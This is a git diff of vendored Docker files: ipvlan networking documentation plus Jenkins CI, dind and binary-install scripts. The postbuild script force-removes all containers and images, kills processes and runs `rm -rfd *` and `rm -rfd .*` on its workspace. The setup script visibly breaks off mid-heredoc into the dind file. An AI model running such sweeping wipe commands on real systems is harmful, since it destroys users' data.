+ +``` +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.20.0/24 \ + --gateway=192.168.20.1 \ + -o parent=eth0.20 ipvlan20 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh +docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh +``` + +**Vlan ID 30** + +In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example. + +``` +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged. +docker network create -d ipvlan \ + --subnet=192.168.30.0/24 \ + --gateway=192.168.30.1 \ + -o parent=eth0.30 \ + -o ipvlan_mode=l2 ipvlan30 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh +docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh +``` + +The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network. + +``` +$ ip route + default via 192.168.30.1 dev eth0 + 192.168.30.0/24 dev eth0 src 192.168.30.2 +``` + +Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. 
+ +Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI). + +``` +docker network create -d ipvlan \ + --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \ + --gateway=192.168.114.254 --gateway=192.168.116.254 \ + -o parent=eth0.114 \ + -o ipvlan_mode=l2 ipvlan114 + +docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh +docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh +``` + +A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network. + +An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. 
Example mappings from NetOps to Docker network commands are as follows: + +- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1 + + - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` + +- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1 + + - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` + +- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1 + + - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` + +### IPVlan L3 Mode Example + +IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples. + +![Docker Ipvlan L3 Mode](images/ipvlan-l3.png) + +Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Protocol Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs (top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 mode is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. 
The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. + +- L3 mode needs to be on a separate subnet from the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface. + +- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`. + +- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`. + +``` +ip a show eth0 +3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff + inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 +``` + +A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply points to the container's `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details. + +The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`. + +The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather than rejecting the network creation and isolating containers from only communicating with one another. 
+ +``` +# Create the Ipvlan L3 network +docker network create -d ipvlan \ + --subnet=192.168.214.0/24 \ + --subnet=10.1.214.0/24 \ + -o ipvlan_mode=l3 ipnet210 + +# Test 192.168.214.0/24 connectivity +docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh +docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh + +# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24 +docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10 + +# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24 +docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10 + +``` + +Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container: + +``` +# Inside an L3 mode container +$ ip route + default dev eth0 + 192.168.120.0/24 dev eth0 src 192.168.120.2 +``` + +In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story. + +### Dual Stack IPv4 IPv6 Ipvlan L2 Mode + +- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families. + +- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`. 
+ +``` +# Create a v6 network +docker network create -d ipvlan \ + --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \ + -o parent=eth0.139 v6ipvlan139 + +# Start a container on the network +docker run --net=v6ipvlan139 -it --rm alpine /bin/sh + +``` + +View the container eth0 interface and v6 routing table: + +``` + eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 172.18.0.2/16 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc2::1/64 scope link nodad + valid_lft forever preferred_lft forever + +root@5c1dc74b1daa:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc2::/64 dev eth0 proto kernel metric 256 +default via 2001:db8:abc2::22 dev eth0 metric 1024 +``` + +Start a second container and ping the first container's v6 address. + +``` +$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh + +root@b817e42fcc54:/# ip a show eth0 +75: eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 172.18.0.3/16 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed + valid_lft forever preferred_lft forever + inet6 2001:db8:abc2::2/64 scope link nodad + valid_lft forever preferred_lft forever + +root@b817e42fcc54:/# ping6 2001:db8:abc2::1 +PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes +64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms +64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms + +2 packets transmitted, 2 packets received, 0% packet loss +round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms +``` + +The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`. 
+ +Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways: + +``` +docker network create -d ipvlan \ + --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \ + --gateway=192.168.140.1 --gateway=192.168.142.1 \ + --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \ + -o parent=eth0.140 \ + -o ipvlan_mode=l2 ipvlan140 +``` + +Start a container and view eth0 and both v4 & v6 routing tables: + +``` +docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh + +root@3cce0d3575f3:/# ip a show eth0 +78: eth0@if77: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 192.168.140.2/24 scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc9::1/64 scope link nodad + valid_lft forever preferred_lft forever + +root@3cce0d3575f3:/# ip route +default via 192.168.140.1 dev eth0 +192.168.140.0/24 dev eth0 proto kernel scope link src 192.168.140.2 + +root@3cce0d3575f3:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc9::/64 dev eth0 proto kernel metric 256 +default via 2001:db8:abc9::22 dev eth0 metric 1024 +``` + +Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets: + +``` +docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh +``` + +**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link. 
+ +### Dual Stack IPv4 IPv6 Ipvlan L3 Mode + +**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118 + +As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback. + +The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets. + +``` +# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network +# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0' +docker network create -d ipvlan \ + --subnet=192.168.110.0/24 \ + --subnet=192.168.112.0/24 \ + --subnet=2001:db8:abc6::/64 \ + -o parent=eth0 \ + -o ipvlan_mode=l3 ipnet110 + + +# Start a few of containers on the network (ipnet110) +# in separate terminals and check connectivity +docker run --net=ipnet110 -it --rm alpine /bin/sh +# Start a second container specifying the v6 address +docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh +# Start a third specifying the IPv4 address +docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh +# Start a 4th specifying both the IPv4 and IPv6 addresses +docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh +``` + +Interface and routing table outputs are as follows: + +``` +root@3a368b2a982e:/# ip a show eth0 +63: eth0@if59: mtu 1500 qdisc noqueue state UNKNOWN group default + link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff + inet 192.168.112.2/24 
scope global eth0 + valid_lft forever preferred_lft forever + inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link + valid_lft forever preferred_lft forever + inet6 2001:db8:abc6::10/64 scope link nodad + valid_lft forever preferred_lft forever + +# Note the default route is simply the eth device because ARPs are filtered. +root@3a368b2a982e:/# ip route + default dev eth0 scope link + 192.168.112.0/24 dev eth0 proto kernel scope link src 192.168.112.2 + +root@3a368b2a982e:/# ip -6 route +2001:db8:abc4::/64 dev eth0 proto kernel metric 256 +2001:db8:abc6::/64 dev eth0 proto kernel metric 256 +default dev eth0 metric 1024 +``` + +*Note:* There may be a bug when specifying `--ip6=` addresses: when you delete a container with a specified v6 address and then start a new container with the same v6 address, it throws the following error, as if the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead. + +``` +docker: Error response from daemon: Address already in use. +``` + +### Manually Creating 802.1q Links + +**Vlan ID 40** + +If a user does not want the driver to create the vlan sub-interface, it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and is up. + +Links, if manually created, can be named anything you want. As long as they exist when the network is created, that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`. 
+ +``` +# create a new sub-interface tied to dot1q vlan 40 +ip link add link eth0 name eth0.40 type vlan id 40 + +# enable the new sub-interface +ip link set eth0.40 up + +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.40.0/24 \ + --gateway=192.168.40.1 \ + -o parent=eth0.40 ipvlan40 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh +docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh +``` + +**Example:** Vlan sub-interface manually created with any name: + +``` +# create a new sub interface tied to dot1q vlan 40 +ip link add link eth0 name foo type vlan id 40 + +# enable the new sub-interface +ip link set foo up + +# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged +docker network create -d ipvlan \ + --subnet=192.168.40.0/24 --gateway=192.168.40.1 \ + -o parent=foo ipvlan40 + +# in two separate terminals, start a Docker container and the containers can now ping one another. +docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh +docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh +``` + +Manually created links can be cleaned up with: + +``` +ip link del foo +``` + +As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user. 
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh new file mode 100644 index 0000000000..662e2dcc37 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh @@ -0,0 +1,35 @@ +set +x +set +e + +echo "" +echo "" +echo "---" +echo "Now starting POST-BUILD steps" +echo "---" +echo "" + +echo INFO: Pointing to $DOCKER_HOST + +if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then + echo INFO: Removing containers... + ! docker rm -vf $(docker ps -aq) +fi + +# Remove all images which don't have docker or debian in the name +if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then + echo INFO: Removing images... + ! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') +fi + +# Kill off any instances of git, go and docker, just in case +! taskkill -F -IM git.exe -T >& /dev/null +! taskkill -F -IM go.exe -T >& /dev/null +! taskkill -F -IM docker.exe -T >& /dev/null + +# Remove everything +! cd /c/jenkins/gopath/src/github.com/docker/docker +! rm -rfd * >& /dev/null +! rm -rfd .* >& /dev/null + +echo INFO: Cleanup complete +exit 0 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh new file mode 100644 index 0000000000..30e5884d97 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh @@ -0,0 +1,309 @@ +# Jenkins CI script for Windows to Linux CI. +# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable. +set +xe +SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016" + +# TODO to make (even) more resilient: +# - Wait for daemon to be running before executing docker commands +# - Check if jq is installed +# - Make sure bash is v4.3 or later. 
Can't do until all Azure nodes on the latest version +# - Make sure we are not running as local system. Can't do until all Azure nodes are updated. +# - Error if docker versions are not equal. Can't do until all Azure nodes are updated +# - Error if go versions are not equal. Can't do until all Azure nodes are updated. +# - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64" +# - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind +# - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP +# - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason +# for doing that is that it mirrors the actual release process for docker.exe which is cross-built. +# However, should absolutely not be a problem if built natively, so nit-picking. +# - Tidy up of images and containers. Either here, or in the teardown script. + +ec=0 +uniques=1 +echo INFO: Started at `date`. Script version $SCRIPT_VER + + +# !README! +# There are two daemons running on the remote Linux host: +# - outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon +# from the sources matching the PR. +# - inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted +# (2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376). +# The windows integration tests are run against this inner daemon. + +# get the ip, inner and outer ports. +ip="${DOCKER_HOST#*://}" +port_outer="${ip#*:}" +# inner port is like outer port with last two digits inverted. 
+port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/') +ip="${ip%%:*}" + +echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner" + +# If TLS is enabled +if [ -n "$DOCKER_TLS_VERIFY" ]; then + protocol=https + if [ -z "$DOCKER_MACHINE_NAME" ]; then + ec=1 + echo "ERROR: DOCKER_MACHINE_NAME is undefined" + fi + certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME) + curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem" + run_extra_args="-v tlscerts:/etc/docker" + daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem" +else + protocol=http +fi + +# Save for use by make.sh and scripts it invokes +export MAIN_DOCKER_HOST="tcp://$ip:$port_inner" + +# Verify we can get the remote node to respond to _ping +if [ $ec -eq 0 ]; then + reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping` + if [ "$reply" != "OK" ]; then + ec=1 + echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node" + echo " at $ip:$port_outer when called with an http request for '_ping'. This implies that" + echo " either the daemon has crashed/is not running, or the Linux node is unavailable." + echo + echo " A regular ping to the remote Linux node is below. It should reply. If not, the" + echo " machine cannot be reached at all and may have crashed. If it does reply, it is" + echo " likely a case of the Linux daemon not running or having crashed, which requires" + echo " further investigation." + echo + echo " Try re-running this CI job, or ask on #docker-dev or #docker-maintainers" + echo " for someone to perform further diagnostics, or take this node out of rotation." + echo + ping $ip + else + echo "INFO: The Linux nodes outer daemon replied to a ping. Good!" + fi +fi + +# Get the version from the remote node. Note this may fail if jq is not installed. +# That's probably worth checking to make sure, just in case. 
+if [ $ec -eq 0 ]; then + remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'` + echo "INFO: Remote daemon is running docker version $remoteVersion" +fi + +# Compare versions. We should really fail if result is no 1. Output at end of script. +if [ $ec -eq 0 ]; then + uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l` +fi + +# Make sure we are in repo +if [ $ec -eq 0 ]; then + if [ ! -d hack ]; then + echo "ERROR: Are you sure this is being launched from a the root of docker repository?" + echo " If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker." + echo " Current directory is `pwd`" + ec=1 + fi +fi + +# Are we in split binary mode? +if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then + splitBinary=0 + echo "INFO: Running in single binary mode" +else + splitBinary=1 + echo "INFO: Running in split binary mode" +fi + + +# Get the commit has and verify we have something +if [ $ec -eq 0 ]; then + export COMMITHASH=$(git rev-parse --short HEAD) + echo INFO: Commmit hash is $COMMITHASH + if [ -z $COMMITHASH ]; then + echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?" + ec=1 + fi +fi + +# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not +# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment +# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which +# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system... +if [ $ec -eq 0 ]; then + export TEMP=/c/CI/CI-$COMMITHASH + export TMP=$TEMP + /usr/bin/mkdir -p $TEMP # Make sure Linux mkdir for -p +fi + +# Tidy up time +if [ $ec -eq 0 ]; then + echo INFO: Deleting pre-existing containers and images... + + # Force remove all containers based on a previously built image with this commit + ! 
docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null + + # Force remove any container with this commithash as a name + ! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null + + # This SHOULD never happen, but just in case, also blow away any containers + # that might be around. + ! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then + echo WARN: There were some leftover containers. Cleaning them up. + ! docker rm -f $(docker ps -aq) + fi + + # Force remove the image if it exists + ! docker rmi -f "docker-$COMMITHASH" &>/dev/null +fi + +# Provide the docker version for debugging purposes. If these fail, game over. +# as the Linux box isn't responding for some reason. +if [ $ec -eq 0 ]; then + echo INFO: Docker version and info of the outer daemon on the Linux node + echo + docker version + ec=$? + if [ 0 -ne $ec ]; then + echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" + fi + echo +fi + +# Same as above, but docker info +if [ $ec -eq 0 ]; then + echo + docker info + ec=$? + if [ 0 -ne $ec ]; then + echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" + fi + echo +fi + +# build the daemon image +if [ $ec -eq 0 ]; then + echo "INFO: Running docker build on Linux host at $DOCKER_HOST" + if [ $splitBinary -eq 0 ]; then + set -x + docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" . + cat < +# See the blog post: https://blog.docker.com/2013/09/docker-can-now-run-within-docker/ +# +# This script should be executed inside a docker container in privileged mode +# ('docker run --privileged', introduced in docker 0.6). + +# Usage: dind CMD [ARG...] + +# apparmor sucks and Docker needs to know that it's in a container (c) @tianon +export container=docker + +if [ -d /sys/kernel/security ] && ! 
mountpoint -q /sys/kernel/security; then + mount -t securityfs none /sys/kernel/security || { + echo >&2 'Could not mount /sys/kernel/security.' + echo >&2 'AppArmor detection and --privileged mode might break.' + } +fi + +# Mount /tmp (conditionally) +if ! mountpoint -q /tmp; then + mount -t tmpfs none /tmp +fi + +if [ $# -gt 0 ]; then + exec "$@" +fi + +echo >&2 'ERROR: No command specified.' +echo >&2 'You probably want to run hack/make.sh, or maybe a shell?' diff --git a/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits new file mode 100755 index 0000000000..8dfcca3946 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits @@ -0,0 +1,11 @@ +#!/bin/sh + +TOMLV_COMMIT=9baf8a8a9f2ed20a8e54160840c492f937eeaf9a + +# When updating RUNC_COMMIT, also update runc in vendor.conf accordingly +RUNC_COMMIT=9df8b306d01f59d3a8029be411de015b7304dd8f +CONTAINERD_COMMIT=aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 +TINI_COMMIT=949e6facb77383876aeff8a6944dde66b3089574 +LIBNETWORK_COMMIT=0f534354b813003a754606689722fe253101bc4e +VNDR_COMMIT=f56bd4504b4fad07a357913687fb652ee54bb3b0 +BINDATA_COMMIT=a0ff2567cfb70903282db057e799fd826784d41d diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh new file mode 100755 index 0000000000..64f2b57da1 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh @@ -0,0 +1,123 @@ +#!/bin/sh +set -e +set -x + +. 
$(dirname "$0")/binaries-commits + +RM_GOPATH=0 + +TMP_GOPATH=${TMP_GOPATH:-""} + +if [ -z "$TMP_GOPATH" ]; then + export GOPATH="$(mktemp -d)" + RM_GOPATH=1 +else + export GOPATH="$TMP_GOPATH" +fi + +# Do not build with ambient capabilities support +RUNC_BUILDTAGS="${RUNC_BUILDTAGS:-"seccomp apparmor selinux"}" + +install_runc() { + echo "Install runc version $RUNC_COMMIT" + git clone https://github.com/docker/runc.git "$GOPATH/src/github.com/opencontainers/runc" + cd "$GOPATH/src/github.com/opencontainers/runc" + git checkout -q "$RUNC_COMMIT" + make BUILDTAGS="$RUNC_BUILDTAGS" $1 + cp runc /usr/local/bin/docker-runc +} + +install_containerd() { + echo "Install containerd version $CONTAINERD_COMMIT" + git clone https://github.com/docker/containerd.git "$GOPATH/src/github.com/docker/containerd" + cd "$GOPATH/src/github.com/docker/containerd" + git checkout -q "$CONTAINERD_COMMIT" + make $1 + cp bin/containerd /usr/local/bin/docker-containerd + cp bin/containerd-shim /usr/local/bin/docker-containerd-shim + cp bin/ctr /usr/local/bin/docker-containerd-ctr +} + +install_proxy() { + echo "Install docker-proxy version $LIBNETWORK_COMMIT" + git clone https://github.com/docker/libnetwork.git "$GOPATH/src/github.com/docker/libnetwork" + cd "$GOPATH/src/github.com/docker/libnetwork" + git checkout -q "$LIBNETWORK_COMMIT" + go build -ldflags="$PROXY_LDFLAGS" -o /usr/local/bin/docker-proxy github.com/docker/libnetwork/cmd/proxy +} + +install_bindata() { + echo "Install go-bindata version $BINDATA_COMMIT" + git clone https://github.com/jteeuwen/go-bindata "$GOPATH/src/github.com/jteeuwen/go-bindata" + cd $GOPATH/src/github.com/jteeuwen/go-bindata + git checkout -q "$BINDATA_COMMIT" + go build -o /usr/local/bin/go-bindata github.com/jteeuwen/go-bindata/go-bindata +} + +for prog in "$@" +do + case $prog in + tomlv) + echo "Install tomlv version $TOMLV_COMMIT" + git clone https://github.com/BurntSushi/toml.git "$GOPATH/src/github.com/BurntSushi/toml" + cd 
"$GOPATH/src/github.com/BurntSushi/toml" && git checkout -q "$TOMLV_COMMIT" + go build -v -o /usr/local/bin/tomlv github.com/BurntSushi/toml/cmd/tomlv + ;; + + runc) + install_runc static + ;; + + runc-dynamic) + install_runc + ;; + + containerd) + install_containerd static + ;; + + containerd-dynamic) + install_containerd + ;; + + tini) + echo "Install tini version $TINI_COMMIT" + git clone https://github.com/krallin/tini.git "$GOPATH/tini" + cd "$GOPATH/tini" + git checkout -q "$TINI_COMMIT" + cmake . + make tini-static + cp tini-static /usr/local/bin/docker-init + ;; + + proxy) + export CGO_ENABLED=0 + install_proxy + ;; + + proxy-dynamic) + PROXY_LDFLAGS="-linkmode=external" install_proxy + ;; + + vndr) + echo "Install vndr version $VNDR_COMMIT" + git clone https://github.com/LK4D4/vndr.git "$GOPATH/src/github.com/LK4D4/vndr" + cd "$GOPATH/src/github.com/LK4D4/vndr" + git checkout -q "$VNDR_COMMIT" + go build -v -o /usr/local/bin/vndr . + ;; + + bindata) + install_bindata + ;; + + *) + echo echo "Usage: $0 [tomlv|runc|containerd|tini|proxy]" + exit 1 + + esac +done + +if [ $RM_GOPATH -eq 1 ]; then + rm -rf "$GOPATH" +fi diff --git a/vendor/github.com/docker/docker/hack/generate-authors.sh b/vendor/github.com/docker/docker/hack/generate-authors.sh new file mode 100755 index 0000000000..e78a97f962 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/generate-authors.sh @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")/.." + +# see also ".mailmap" for how email addresses and names are deduplicated + +{ + cat <<-'EOH' + # This file lists all individuals having contributed content to the repository. + # For how it is generated, see `hack/generate-authors.sh`. 
